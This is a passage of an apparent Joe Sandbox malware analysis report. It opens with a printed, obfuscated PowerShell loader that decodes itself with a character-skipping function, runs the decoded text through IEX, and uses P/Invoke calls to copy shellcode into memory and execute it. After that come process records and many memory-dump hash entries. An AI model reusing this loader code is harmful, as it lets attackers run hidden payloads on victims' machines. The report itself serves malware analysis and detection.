Br[AsSTiyUnsObtTweDrmBe.LiCStoRenorvKieVarAptEn]Ma:Ap:GeFKlrInoMumUdBseaImsInePl6fi4CaSVotBarBaiTonWagva(Se`$BeSLeeSnlBlvJafHulAfgpeeFrlBeiPhgGi)Ap;Pu[PiSOvyelsThtOxeSemge.SiRObuFrnBrtapiMumKleju.PiISpnRatIneUnrSyoAppneSPreSkrCovTiiJacAkeLessl.SiMStaTarFosCohTaaprlFa]Bl:Ci:TrCBooOupSkyAf(Fl`$UnGKurPaiKrsBrkDrece,di Pe0Up,Br Vl Pi`$GlMNieBatBlhSiyMylDe3Pr,Pr Sp`$ZoGArrCriTesHakPheSt.PrcGroSpuPonKntSp)Ph;Ho[TiMHeeAltAkhKnyPrlFa1Au]Si:Ru:CuEHjnPruMemFrSKoyressetKoeSpmVoLSloNucCaaMulpeeinsOvWBr(Sa`$AvMSkeNotSthDdyStlMe3Ir,Ka Ud0Sl)Ne#Sc;""";Function Methyl4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1); } $Teviss;}$Undefatigable0 = Methyl4 'SoIOrEReXAq ';$Undefatigable1= Methyl4 $Thyridia;&$Undefatigable0 $Undefatigable1;;
              Imagebase:0x160000
              File size:430592 bytes
              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              Target ID:4
              Start time:17:58:31
              Start date:28/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6da640000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:12
              Start time:17:59:35
              Start date:28/11/2022
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline
              Imagebase:0x300000
              File size:2170976 bytes
              MD5 hash:350C52F71BDED7B99668585C15D70EEA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:moderate

              Target ID:13
              Start time:17:59:35
              Start date:28/11/2022
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"
              Imagebase:0x10c0000
              File size:43176 bytes
              MD5 hash:C09985AE74F0882F208D75DE27770DFA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Reset < >
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 8^%l
                • API String ID: 0-3725521276
                • Opcode ID: 64f22169e828137f79e52f3bc2e8e50479c4e9922b164cf1a3be3b4dff5d085a
                • Instruction ID: 32c2eefa772c966bd2976dac8244978e521ea48fb6d7ac29e830c33bbd263c4a
                • Opcode Fuzzy Hash: 64f22169e828137f79e52f3bc2e8e50479c4e9922b164cf1a3be3b4dff5d085a
                • Instruction Fuzzy Hash: D6D11734A00218CFDB24CF64C994B9DBBB6FF89314F1981A9D449AB792DB319D86CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 8^%l
                • API String ID: 0-3725521276
                • Opcode ID: 82ab9c379e9ed47f25c133d0a70c1c0164b4e9cbc9b67e460901f2858ecaac75
                • Instruction ID: a55b8adbefb36ac51e0c668e7ea4dd3233773abaf712bc824bdd40e66f0f6c9a
                • Opcode Fuzzy Hash: 82ab9c379e9ed47f25c133d0a70c1c0164b4e9cbc9b67e460901f2858ecaac75
                • Instruction Fuzzy Hash: 3E513974A40219CFDB24CF64DA54A9DBBF2BF8C210F1981A9D449EB391EB309986CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 81b603433bfe7adc159662163d3bc234342902d09fa422ee9fce7e107befc9a5
                • Instruction ID: 1efd7c83eb89f04918dfd3cfdb4cc0f3d0e3f8c056f7ee31784390db81f2808d
                • Opcode Fuzzy Hash: 81b603433bfe7adc159662163d3bc234342902d09fa422ee9fce7e107befc9a5
                • Instruction Fuzzy Hash: 13F14235B00208AFDB14DFA8D494A9EB7F2FF88314F198569E505AB751DB31EC82CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0e775088b324e5c4910a0552a5cae628c655433f213757b28704c40dbde7155d
                • Instruction ID: 37c8553299aea54536a8ca711647fd1113bc402fa8192347ddd28e3991b06808
                • Opcode Fuzzy Hash: 0e775088b324e5c4910a0552a5cae628c655433f213757b28704c40dbde7155d
                • Instruction Fuzzy Hash: 3581A231A0E3849FCB02CB68C8A15D9BFB1AF4B210B1A45D7D580EF2A3C7359D55CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9c117cee1f316d895d6572c86316afdeeb87da7cadb271f97ba3666894beed93
                • Instruction ID: 8385c7a0825c032d1579ff894a781cd20fff6d4477f8f7fdd496e32596afecca
                • Opcode Fuzzy Hash: 9c117cee1f316d895d6572c86316afdeeb87da7cadb271f97ba3666894beed93
                • Instruction Fuzzy Hash: BF912974E00209DFCB04DFA9D894AAEBBF2FF89314F148469E905AB351DB35A945CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e5ce92904a06194e99d77056d366bbc76e0675d63ad3529cf11dba0c3af10d1a
                • Instruction ID: 00f9fa2926f7e26ba53e9156fa3cb3a0693ae1387395b445a6fd9300716128d3
                • Opcode Fuzzy Hash: e5ce92904a06194e99d77056d366bbc76e0675d63ad3529cf11dba0c3af10d1a
                • Instruction Fuzzy Hash: B071BE75B002089FCB14DFA8E8586AEBBF6EF89315F14802AE516E7390DF359D06CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 345aff5638bda6a4af93c61551a5281a3c932f3e2fd01c68b417c4bc21b6f109
                • Instruction ID: e4466d8ad2e7e3cae820db04eb1c7ac5490445850ea5736e864eafc07ec27e98
                • Opcode Fuzzy Hash: 345aff5638bda6a4af93c61551a5281a3c932f3e2fd01c68b417c4bc21b6f109
                • Instruction Fuzzy Hash: 8C51EA74A00109AFDB04DF98D594A9EFBF2FF89314F258569E905AB361CB71DC82CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f38e0297881e36d8cf575653ddbcbb4a7b60da05ee1f08101b325c0b99bcca24
                • Instruction ID: 27bc9754ac4767fb140b1334d254004de4ddaeeb46754704e426dbacee7fa39a
                • Opcode Fuzzy Hash: f38e0297881e36d8cf575653ddbcbb4a7b60da05ee1f08101b325c0b99bcca24
                • Instruction Fuzzy Hash: 4C418D35A452049FD715CF6AC840A5ABBF5EF8A720F1AC0AAE548CB361DB34DC05CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 767b3b965f89db19600c67e8414668f927ecba917745ab26353972f10a466643
                • Instruction ID: b6a2e337a6179a6db62e8001f0a54a0004aa1305db0d2dfd12dbc82f46f85e57
                • Opcode Fuzzy Hash: 767b3b965f89db19600c67e8414668f927ecba917745ab26353972f10a466643
                • Instruction Fuzzy Hash: D5417275A0021A9FCB04DFA8D9809DEF7F6FF88315B14C939D105EB254EB71AA16CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8eeaaa73b164b8de95c1ca6ae20b67e3f730322fdcdd2a634157e866add50ba1
                • Instruction ID: 049fa52a3085ef7c0abe62ac97145fafd321e1bfaeffe4294669882c78cc139c
                • Opcode Fuzzy Hash: 8eeaaa73b164b8de95c1ca6ae20b67e3f730322fdcdd2a634157e866add50ba1
                • Instruction Fuzzy Hash: 5E410975A005199FCB14CF9CC8819AEF7B2FF8C320B25826AEA15A7750C331EC52CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f4c85e4bb63851018a12197e64d57a0afc73871f58e38e581fa133bbde659e10
                • Instruction ID: 2ec01870a1e39d021b8116c492ff3b1159e9972f17a20847b65bf9fe0322209b
                • Opcode Fuzzy Hash: f4c85e4bb63851018a12197e64d57a0afc73871f58e38e581fa133bbde659e10
                • Instruction Fuzzy Hash: 5A31ED34601304CFCB24DB24D548AAEBBF6EF89314F1884AAE405DB791CB75EC45CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dfbdc1e370b2f557dbb916f070156b9177f37ee1a93869b7cddfa59cc0222232
                • Instruction ID: 19e07eede9155068ff9df47faac5b842b4cdbe07876c9d47c476de20f13f2fda
                • Opcode Fuzzy Hash: dfbdc1e370b2f557dbb916f070156b9177f37ee1a93869b7cddfa59cc0222232
                • Instruction Fuzzy Hash: 6A411734A00209EFCB14DF94D994AADFBF2FF89315F14C569E505AB251CB31A985CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9d4ca8296ecb466717a93b8226611a358113d71514f7bd7fb068456e7b1f4c74
                • Instruction ID: 64c44bfdf405151870aae3abcaa2b77b5fbaba3b644ae9422584457a26e2aff9
                • Opcode Fuzzy Hash: 9d4ca8296ecb466717a93b8226611a358113d71514f7bd7fb068456e7b1f4c74
                • Instruction Fuzzy Hash: 29312779A002189FCB04DFA9D9809ADBBF6FF8D320B2581A5D805AB355D730AD41CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fec9c1eeade681ca46fe5769fcf6dbaeeb9368280ed21953f71c108d65a57e91
                • Instruction ID: 5f1d128cc6e4cf7dc57fe923dba9a5a25ab4124b8d2fdb690a0319e3a50e9b91
                • Opcode Fuzzy Hash: fec9c1eeade681ca46fe5769fcf6dbaeeb9368280ed21953f71c108d65a57e91
                • Instruction Fuzzy Hash: EB11ED393002009BC324EB2AD55466AF3D6EF88264B19C93DD11ECB780DB76ED068BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7ce6131abffc569b33dcd375bbf5d673c395989a4c95fe11e722fa9baf986352
                • Instruction ID: 0fe941a560978e24620fb173435a7de46c40b28e005c8f8f1f7c4c4bf61d691a
                • Opcode Fuzzy Hash: 7ce6131abffc569b33dcd375bbf5d673c395989a4c95fe11e722fa9baf986352
                • Instruction Fuzzy Hash: FD11C635A00209EFCB05CF94D484E9DBBB2BF48324F298559E504AB361C771E892CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.523458198.000000000330D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0330D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_330d000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c8b16110ec220a84a6fc70a3244ac90dcec5c6c642b672a3475654e859c4d8c6
                • Instruction ID: bb12e0fabbe125386dc6623aa57f5adfa6c3672bee93b3278e382c54c68ebf59
                • Opcode Fuzzy Hash: c8b16110ec220a84a6fc70a3244ac90dcec5c6c642b672a3475654e859c4d8c6
                • Instruction Fuzzy Hash: 9B0126B1408340AAE710CA65CDC4B67FBDCEF42268F08C05AED4D4B6C6C3BD9946CAB1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.523458198.000000000330D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0330D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_330d000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 12c010920c32d84f8f16fb26e3c7241ec59b720fd6a637e940576fbc250b6974
                • Instruction ID: 800efcf98956a6e9bdb51c02194e5c0670e382159ee67222f0649ea986324b1b
                • Opcode Fuzzy Hash: 12c010920c32d84f8f16fb26e3c7241ec59b720fd6a637e940576fbc250b6974
                • Instruction Fuzzy Hash: 89012D6140D3C09FD7128B25CC94B56BFB4EF43224F1D80CBD9888F297C2695849CB72
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1709ff24e1cfc4961ea79f59e380537202b3198a26cfe7c75b47bb8fc6d5e3d7
                • Instruction ID: 1663989227c1cbe1d9a847df653fa97aa10bb8951423094fdb1a97fa741a26c1
                • Opcode Fuzzy Hash: 1709ff24e1cfc4961ea79f59e380537202b3198a26cfe7c75b47bb8fc6d5e3d7
                • Instruction Fuzzy Hash: 99018F75600300DFC314CB58E848A1BBBF5EF8E314B0980A9E409CB362D774EC00CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9f5eb7ef0897635ebc5dec0f0003aa931c7d8873616364293f79f3433e16f7c9
                • Instruction ID: 13d52b4bc13030ef0eca76629a73778771edf49d2681f7fc09552808b1560c77
                • Opcode Fuzzy Hash: 9f5eb7ef0897635ebc5dec0f0003aa931c7d8873616364293f79f3433e16f7c9
                • Instruction Fuzzy Hash: 14F0C23A7401009FC300CB69C984E46BBE6EF8D721B1A80AAE508CB772CA30EC06C791
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8b46d9707fb3db4b9c940e154dfdadddd41b90cffbb0133549b828ce1104c7b3
                • Instruction ID: 87a2745df8e1a9af4e533388e654841a75f099855625ef66f36944235c95688c
                • Opcode Fuzzy Hash: 8b46d9707fb3db4b9c940e154dfdadddd41b90cffbb0133549b828ce1104c7b3
                • Instruction Fuzzy Hash: D801E878E0021ACFCB80DF68C585A9DBBF1BF49214F5141A5D609DB326E730AA55CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1e7da9815a97855f80a830946fddaba1a1f933c0ab0a54d5bd1d6fc4f7a96e86
                • Instruction ID: 0ad872c7d4c0a8334d3df93a5f8c14def6e10b26278b8e3ef13b6bc8b07e02e0
                • Opcode Fuzzy Hash: 1e7da9815a97855f80a830946fddaba1a1f933c0ab0a54d5bd1d6fc4f7a96e86
                • Instruction Fuzzy Hash: 7AF0E9352082585FD712CF29E8A08AA7FB9EB8D2A431D40A6E945C7342DB31DD01C7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3dccc8d8b753b56e98bb3359ccc8bcd774f158eb723ddd8a0e0cdbddbec87873
                • Instruction ID: 0d99f9a16bb4fc93e5202f2130004f4f7759a737bb42ccf5b46bb338b422458a
                • Opcode Fuzzy Hash: 3dccc8d8b753b56e98bb3359ccc8bcd774f158eb723ddd8a0e0cdbddbec87873
                • Instruction Fuzzy Hash: 95E09B757042189F9710DA1DE88485BBBEDFB8C2B03194436E909D7341DF31DD4187B0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1e3f77ac0db18c53dd09c2355841301412f10217f6be3548a6d694a3df25fdf2
                • Instruction ID: 922859ad04917cb8c3389fe8f7124a3d3aba868f240818ee8bb112589dc9e3f4
                • Opcode Fuzzy Hash: 1e3f77ac0db18c53dd09c2355841301412f10217f6be3548a6d694a3df25fdf2
                • Instruction Fuzzy Hash: 18F0A974E0420ACFC780DF68C5859AEBBF1BF49214F5141A9D609DB321D730A951CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e7dd689b36733769229c31f42b1bc346a305cd0377625bbd4ca84a3c752676e6
                • Instruction ID: 500c63b8e0014bcc2b7b8d5e32d24d665014d245cc65cce1abc9b04b35667b22
                • Opcode Fuzzy Hash: e7dd689b36733769229c31f42b1bc346a305cd0377625bbd4ca84a3c752676e6
                • Instruction Fuzzy Hash: 7BE02B317053956BC70A5679D81046BFF9AEFC7210719806BE804C7352DF708C168390
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1157fda7f71f06a5d067e33d4606abfc9f0f0f9330d5fb139db8e2ab4873f5f8
                • Instruction ID: 69fea419ddf66d63bfd72a5aa079958764e82aafea04bdcb1227a204b798dfc2
                • Opcode Fuzzy Hash: 1157fda7f71f06a5d067e33d4606abfc9f0f0f9330d5fb139db8e2ab4873f5f8
                • Instruction Fuzzy Hash: CAE0E5B0C0120DDFCB44DFA9C8419AEBBF5FB48300F10856AE918A6300E3358AA1CF80
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7f75a9302f68f26e790e02fb2a4ac91c5ef7693c4a5137d20ea7ad01efdbd146
                • Instruction ID: 561a544114d1de0bb0bd23dac09d454bf5b3861aa58edcda0dde3a8df8e361b8
                • Opcode Fuzzy Hash: 7f75a9302f68f26e790e02fb2a4ac91c5ef7693c4a5137d20ea7ad01efdbd146
                • Instruction Fuzzy Hash: 25D0973020E3809FEF070B3098542903FB04F46308F1140E7C481CE197C23B4097C712
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eb9ddec96e2a48fa0f36d130fe1f0dd073cdc06dcd59dc1e8dd7aa1865b05f4c
                • Instruction ID: 3984930a6fcfaeb8f17cd904844ca5cfefdc67214a091789e5a205568918cde1
                • Opcode Fuzzy Hash: eb9ddec96e2a48fa0f36d130fe1f0dd073cdc06dcd59dc1e8dd7aa1865b05f4c
                • Instruction Fuzzy Hash: 6EC08C3500E2E06FCB23877088796063FE5AF4350038C04C9C084CF2A7C214A409CB23
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.518905303.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_3140000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a25060a4d4ed6a42b51896208e6206d1252ff7803cf83ac89750645bc9dcfe1f
                • Instruction ID: 98a298ec719387e66c430cbd41431762a2a46635654211cccbc57462e8829ab3
                • Opcode Fuzzy Hash: a25060a4d4ed6a42b51896208e6206d1252ff7803cf83ac89750645bc9dcfe1f
                • Instruction Fuzzy Hash: 8CC02B3024834C0FF70033B03C09729372D0784344F4000B195494E693C84904925344
                Uniqueness

                Uniqueness Score: -1.00%